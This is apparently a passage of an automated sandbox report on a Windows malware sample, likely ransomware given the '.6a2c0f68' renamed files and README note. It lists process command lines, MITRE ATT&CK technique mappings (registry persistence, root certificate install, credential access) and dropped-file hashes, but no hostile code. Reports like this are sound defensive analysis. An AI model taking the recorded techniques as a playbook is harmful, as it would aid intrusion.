C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1528 --field-trial-handle=1380,i,9726067790594750551,11650438630861183804,131072 /prefetch:8
2⤵
PID:608

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1632 --field-trial-handle=1380,i,9726067790594750551,11650438630861183804,131072 /prefetch:8
2⤵
PID:944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2168 --field-trial-handle=1380,i,9726067790594750551,11650438630861183804,131072 /prefetch:1
2⤵
PID:1308

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2132 --field-trial-handle=1380,i,9726067790594750551,11650438630861183804,131072 /prefetch:1
2⤵
PID:520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1312 --field-trial-handle=1380,i,9726067790594750551,11650438630861183804,131072 /prefetch:2
2⤵
PID:2580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1376 --field-trial-handle=1380,i,9726067790594750551,11650438630861183804,131072 /prefetch:1
2⤵
PID:2900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3928 --field-trial-handle=1380,i,9726067790594750551,11650438630861183804,131072 /prefetch:8
2⤵
PID:2908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4048 --field-trial-handle=1380,i,9726067790594750551,11650438630861183804,131072 /prefetch:8
2⤵
PID:2924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3972 --field-trial-handle=1380,i,9726067790594750551,11650438630861183804,131072 /prefetch:1
2⤵
PID:2140

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2072

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2372

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\ConvertFromUnpublish.mpg.6a2c0f68
1⤵
- Modifies registry class
PID:2588

C:\Program Files\Microsoft Games\solitaire\solitaire.exe
"C:\Program Files\Microsoft Games\solitaire\solitaire.exe"
1⤵
PID:228

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
dd3f2bb158b811f20d8be47c0540dbe2

SHA1
337004237b44b30c61326486924ee27c466a5c43

SHA256
319a4e9a53a57d3a95e2a08a6539a262e9234220e773536bca2eccb4597118b4

SHA512
212b66f810913673bb96da3419ddc0ad63a5f3c3dbfcaed04ed2a7902abd8e5e1959bbd47ab7066dce16929324a95861a701ecaf8d4eb2a0cb9107b1f5108b0d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
Filesize
40B

MD5
4e466fd85d75f2dbe028b3928e8d778f

SHA1
ec495673585b78f478cb124657160be66a6bad31

SHA256
0f540d79e6b6ba7c07aa6390d7f3e0f9a1484ed30e9ca5c092b954468fbeb3d6

SHA512
501c696ce4e26a74e7bb0ae863e068df41db65148d2ef6502a8427ccb8305dd68976713519bc4472cc023f792c1543c47be8bdd3dfbec9cfbd34fefa7f1ed964

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1
Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1
Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
Filesize
247B

MD5
b657b10ff28f21e186fe6ae229b0292d

SHA1
19f9447c24084278ffcf0ea27d35d0632a96f472

SHA256
29f4d1491bf2c6ea0a2469388cc3367af12bfc46f4089eefacf1117bbde23ba3

SHA512
bbdd280fcf8bfa58d671ad687009eb6241a6918ca14384f6ca6625601f3fe650090db2b1451b99357435cc31832cc71334ac18ab030a34eac0d9b59d4739dac7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000004
Filesize
50B

MD5
494e626a5079642efed0f0c7f38bd4ef

SHA1
0cbead74a33ad551eae3b25c213d3b080535589b

SHA256
9ce8bd68fe0b86c0bf2067d549e7b93bc1c24f12bdfd227aba521e9d7e704436

SHA512
659bc9699799757dec5b257d78949d378caf03001890f7ae24d28055cff7175d85f8ea14393048aab1c0ba460082f568e5f4bfacdb8921f006f98989293fe78d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
Filesize
136B

MD5
3f5f75b1d3c5aec491badc9c7106ced2

SHA1
c4d7511e9d9d227b8410d260543debec34a77688

SHA256
04706dfea73a03aaf56f90169d55823b51f7c5b2cbc678e1c3c766470bdacdce

SHA512
c952cff98b19f04dd38d2671fd214e45127cbdd6fd4e441401a90a9f4dd3688b9fe86f202a45afa5ebe31eab6ce2ce449257bddc85832a6ab4c8fd6071bf061e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000004
Filesize
50B

MD5
031d6d1e28fe41a9bdcbd8a21da92df1

SHA1
38cee81cb035a60a23d6e045e5d72116f2a58683

SHA256
b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da

SHA512
e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
4KB

MD5
d855e8e68d976557b9c1d3f39a6ec914

SHA1
dc54f603d5686de2fb7e04b165e7ee9c5beed533

SHA256
b401fcd529042a31114f28b0cb3f7f5de6cbfa760cf7c287170c9ff9d8d14cfc

SHA512
9b55aabf879d92fb55d3c7e61cb99343f4566d20aeebe713b836338a2a77e5e65818b0320f263fd5ffa9c102589285090c5d92ddc747b24ea6e9f0f24519b39b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000005.ldb
Filesize
141B

MD5
38fc535a8f11d7e955ef58cc63158eff

SHA1
c45ad3ee106dbfb65dce7c09b53140f34454cd0e

SHA256
085c44dfa11e65ac3548c4d0fe1ae641570f90c7caaa2881c3990efcf555e6a8

SHA512
26e70000f77c1b6388dd470f9d7ec6bedc4fc3c43e48efcc853812eb076108bcdd9f50f7a89265e431d33df96e71755ca242dfd0aac16a51d99dea50a5a1e505

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000006.log
Filesize
19B

MD5
e556f26df3e95c19dbaeca8f5df0c341

SHA1
247a89f0557fc3666b5173833db198b188f3aa2e

SHA256
b0a7b19404285905663876774a2176939a6ed75ef3904e44283a125824bd0bf3

SHA512
055bc4ab12feedf3245eaaf0a0109036909c44e3b69916f8a01e6c8459785317fe75ca6b28f8b339316fc2310d3e5392cd15dbdb0f84016667f304d377444e2e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG
Filesize
249B

MD5
74aca424c4e2ac8973455917ffd7a99d

SHA1
3eaeba3227e4f43a93b8cc95054d36ebd6c146e5

SHA256
7b6d636d31d4bf2e36c895004d6919413e091b9ad87195dba3882cc09ff58bb4

SHA512
9de386cb6b2612f4a6865475652c44e706bd28ceb137a1a37fc8f2687393f742c7f27e548e21275f40d7729af7e76a6d1463b59195f3006b147820ddc52d4569

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\MANIFEST-000004
Filesize
90B

MD5
ac5ca65c3ca57b518ed4b2967d8bb535

SHA1
2a120e38f4d5b88eef5003739731e3244b9e104d

SHA256
736bbc68d3228bcee4e4acfb6719cf67aac09f05745a957123658b8740071790

SHA512
aabb0beaab621117d70e29804b611d5296ffa799bdcb85ce8165ee28e87eadad975382c46d2a4a3d1bfd7843a20c19a9bd8bdd47ab691a86677dd55a56a45cd9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13330251238332000
Filesize
300B

MD5
0813b57d840311bdac51222bd35f84e8

SHA1
c4d7ff41d95ec51aeefbeb9fbfd184841de08118

SHA256
10cba24e8e634cb25f7dc10f8cbb1261bc46f9f118c8b9666c61af3782ef7a10

SHA512
5bc4eac4822015c7796957721eda23838550af56a91932362df189aa8fa6605fee9464694457240e2ac3ad1de01254dfdacc79065b012cb0e2f11d3c5696298b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000005.ldb
Filesize
130B

MD5
0d30bb8b60f3c477b7f5bee76de87a5e

SHA1
754db054cc38503c0a7b261489b25208749dce50

SHA256
7d66803b525484d42d0699ed1a2370028b7aa21ce173ea3cb9331cb80d01b695

SHA512
fb43e45b6676ea12643127731a1d3fcd783c16b4b6aba0d31ea93af19020248d766ea877a7abfdfe484e70bd4c2ed8d66f44ac2c3da38885b3edbad41ef68c43

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
Filesize
249B

MD5
054d4ca2580de9565692f82e9c89caff

SHA1
f0ad985eb881818afb753e13b4db104ada541e05

SHA256
79f4bc544be51d35e7a94423e08efd4e0870daaf10bb387155f7f3e76acd7f81

SHA512
83d223f50376d62dab3071f2d669cfa987840695e78fd09928e5ce16655f186376c52945846606858369f61cfe6eb9b10d1554bb61fcaab4fbe5eb896461a7b5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\MANIFEST-000004
Filesize
107B

MD5
f3a604cc1687a04eaabc91b49ed90eac

SHA1
507d0c1334e11f23da43bb9c8702652511893d03

SHA256
628a12f2ebfd6d19731a8a362956c95803f1d909293f6936542fb458d8be1a39

SHA512
a49c1632af45f2a938c2752aeb67e254e92a04bff91affe95952ba7960a60ec143639565790898d55a5ac4d5eb34c2dab1b93e295840d4e30cf3b16d913a7806

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000005.ldb
Filesize
136B

MD5
fe382e791274914bee5950777e4f1fd3

SHA1
53b523b5fc87e66f2520a0b5f9ea080072668f4d

SHA256
935d36c021d0e08a5648c622f3f6fde376e3310013680ae598c0e22dc943d132

SHA512
a5f608fb4f0a1dbc4c5d1b739b1a5b6f50cac1d6a61312b19abf9f601882a291d73524ac55bbe183e4e64db8dcc203d4bf3cedc734fd04bd448cb825d98d1e67

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
Filesize
249B

MD5
eebe61d6ff82c5e1e5280fa7e8f59112

SHA1
ae38d954f38022304953e9464fbbd6eef5d18f7d

SHA256
7b3c3d17909a9254e816db8e5be4f5272b74f5c6bffc7f95441446a6e7babd92

SHA512
a8f2923444d00ef4183611b113264b90720fe58089a3217d375a28bca58f24d15736c923cc36db6909a5d27d5b9f5d0810a771daff0a998c2fdf0f69a3b88780

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000004
Filesize
117B

MD5
63d832bd47d6e550eaef754596d8fdaa

SHA1
3b11fd4048f84fe5143057e7e90a42c4220e1807

SHA256
4dd9ab33b9f8a5aa6b190ee3a88133be4d10b5dfdeff0c3ca060b825ff6420dd

SHA512
586287b26249591e5ae5ba0847bfcb3c3c4bbfb0cef433ecfb2052bbf0f37527bb72ddc57447c37c6879f50a28c96575b911fd121c3f145a061ff57ccacf479c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000006.log
Filesize
19B

MD5
0407b455f23e3655661ba46a574cfca4

SHA1
855cb7cc8eac30458b4207614d046cb09ee3a591

SHA256
ab5c71347d95f319781df230012713c7819ac0d69373e8c9a7302cae3f9a04b7

SHA512
3020f7c87dc5201589fa43e03b1591ed8beb64523b37eb3736557f3ab7d654980fb42284115a69d91de44204cefab751b60466c0ef677608467de43d41bfb939

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG
Filesize
247B

MD5
99c19ebfbb5da85e9d761eac17f149fc

SHA1
775be9f3fc735718f76d5c6f2300c0e0fb2b0aa0

SHA256
782d946a061558c2fe9df937142d5f9a43e33a7edd902cee36b6cbf81f773a5c

SHA512
c721b0fb5ebcd46928783f0fa39fc871869ce02955efa04dbe199051e31813f7ed9c94ce74cf213fe7a6ed6e1d5ecd788500d349351385de88f0d889b358041e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\MANIFEST-000004
Filesize
50B

MD5
494e626a5079642efed0f0c7f38bd4ef

SHA1
0cbead74a33ad551eae3b25c213d3b080535589b

SHA256
9ce8bd68fe0b86c0bf2067d549e7b93bc1c24f12bdfd227aba521e9d7e704436

SHA512
659bc9699799757dec5b257d78949d378caf03001890f7ae24d28055cff7175d85f8ea14393048aab1c0ba460082f568e5f4bfacdb8921f006f98989293fe78d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000004.dbtmp
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000005.ldb
Filesize
172B

MD5
fc496fa0be2ef759d8f66ad47c4e8aa3

SHA1
68b12df8934513df301f12586a6bb59d5f7acdda

SHA256
22e9bf1e2d01ec2b6b809206dce898fcfb5d25adf821535c48285ff55c63b41c

SHA512
082c33facbe89998d8ecea89fd11c76c68cbaff7da0449fd64bf2df57ec08629bca2efa0da006e8483dd985292b8df3f5c46cd15cb95db83233999f92449a27c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000006.log
Filesize
34B

MD5
e6cb57d5ff2bf19c00df08192817ef6b

SHA1
bd8c86bec20eaa0915605e7d850cb5805854a19c

SHA256
bebe07ffe315ac15b01f6c6e696ab83075a13918d37f860e7b0a8f91a5d9667c

SHA512
0f6b83a5ac94854550b02dcf705a6f65745311c10335585a761896aa95a3498725be27bd3067a1ad455e56533317cb4559d3c39fe6ec38063102ec9d64076745

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG
Filesize
249B

MD5
59d9d9481857cd55bedbdf66790aea03

SHA1
64ccd9a11c63b236f37cdcb4b02062230bed5f30

SHA256
c646a6e4185731fb44fc17290f3205a085d35668d454067b6e1817ffc6154868

SHA512
7f92f0201de641fa1de4febd9916d4069603c6d55e971b6ebeb5390fe3a140ab43a9edd34fb2a4ae26886e819a8a4a70e2e71c5453aaed5b072a0b223057531f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\MANIFEST-000004
Filesize
84B

MD5
be2a12b06745bb5de6254b2592d8ab20

SHA1
19a3dc035140689628e54095af6c4b4dae44b55d

SHA256
29e140732c7fc2d81fb1f506cc94386ce55f27446f9277e66236080cdf6f5944

SHA512
fad84027f46c0d4e4fb0357c15d77f7a86c941042ce538e0e89e5b8c477ed3cb46e262e3a3da186eadbb266c9288965c7299b4dc2a7ae1b346230dc48a7ecdba

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
Filesize
14B

MD5
9eae63c7a967fc314dd311d9f46a45b7

SHA1
caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf

SHA256
4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d

SHA512
bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
158KB

MD5
7e16407b2c89c3c825faab5c199cc01d

SHA1
a88fa76084e5492834dcab21131078134a736877

SHA256
2c5d391d757126820346fcb78069e6bcde54634a0c212eefbca952d06ff9dfb2

SHA512
65f8f530d87859fd09cf49bbb177db349d48df52ed5e79ce52e8f18e4d19c6c7fbcc715f98462a7ff8b5afe1454f8b242262ba783f6011e76fcc7403b2e852f7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations
Filesize
86B

MD5
961e3604f228b0d10541ebf921500c86

SHA1
6e00570d9f78d9cfebe67d4da5efe546543949a7

SHA256
f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed

SHA512
535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\c9b91a3d-87c9-4bab-a036-27cd27335dcc.tmp
Filesize
158KB

MD5
64beaf2759d7c79e8608f6235d8ea660

SHA1
e6f943d3ffbdca3feff5527d6e18f647b9b58a6d

SHA256
a5f4e553666e9674d8fb017b737b998270a0f16e8d2a2a19892fef363d114f7f

SHA512
c137286810f073031b3d0d23e0f7546776dea71e8cc457cae4aec0cf6da495d06c0844470660404888b38844981991317a6b47fc8befc4aa4749dd9da73f5253

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabA779.tmp
Filesize
61KB

MD5
fc4666cbca561e864e7fdf883a9e6661

SHA1
2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

SHA256
10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

SHA512
c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarA8E7.tmp
Filesize
164KB

MD5
4ff65ad929cd9a367680e0e5b1c08166

SHA1
c0af0d4396bd1f15c45f39d3b849ba444233b3a2

SHA256
c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

SHA512
f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
ff1249173f03e3089fe1a2f50d2211be

SHA1
07986e21625db8460242167853ed9d75f665747d

SHA256
398271161ba858c7456ff7997a859394f2e95c201b8acd139ce2e9f3428b6a8e

SHA512
65eccb7c9d1f16e675f5c85bc495ed73426186b378b2934aa16bafbabc2d947ddc2368114ea5f6bba105a83ebeb1ef3423c947713d7e4e1c1d43a2098baa1771

Download Submit
C:\Users\Admin\README.6a2c0f68.TXT
Filesize
3KB

MD5
b58e2411168bbdbec635cf4001635db0

SHA1
c130cd9caaaa514a6b98c1168e10d44a989d191a

SHA256
652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a

SHA512
87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\crashpad_1008_EBANOUELOPRPEKBF
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/228-520-0x0000000001B90000-0x0000000001B9A000-memory.dmp

Filesize
40KB

Download
memory/228-519-0x0000000001B90000-0x0000000001B9A000-memory.dmp

Filesize
40KB

Download
memory/228-518-0x0000000001B90000-0x0000000001B9A000-memory.dmp

Filesize
40KB

Download
memory/228-521-0x0000000001B90000-0x0000000001B9A000-memory.dmp

Filesize
40KB

Download
memory/228-517-0x0000000001B80000-0x0000000001B81000-memory.dmp

Filesize
4KB

Download
memory/1316-141-0x000000001B300000-0x000000001B5E2000-memory.dmp

Filesize
2.9MB

Download
memory/1316-142-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/1316-184-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download
memory/1316-180-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download
memory/1316-179-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download